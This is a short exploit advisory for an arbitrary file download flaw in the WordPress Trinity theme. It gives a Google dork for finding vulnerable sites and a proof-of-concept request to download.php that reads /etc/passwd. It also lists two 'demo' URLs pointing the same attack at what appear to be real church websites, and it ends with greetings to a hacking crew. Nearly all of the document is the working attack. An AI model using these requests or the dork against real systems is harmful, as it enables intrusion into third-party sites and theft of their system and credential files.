# Exploit Title: Wordpress Trinity theme Arbitrary File Download Vulnerability
# Date: 9/10/2014
# Google Dork : inurl:/wp-content/themes/trinity/lib
# Exploit Author: Mr.Doel
# Vendor Homepage: https://churchthemes.net/themes/trinity/
# Tested on: Windows 7 

POC :

http://localhost/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd

Demo :

www.firstbco.net/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd

http://laurelchurch.webfactional.com/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd

=====================
Greetz :

Malang Cyber Crew - Indonesian Coder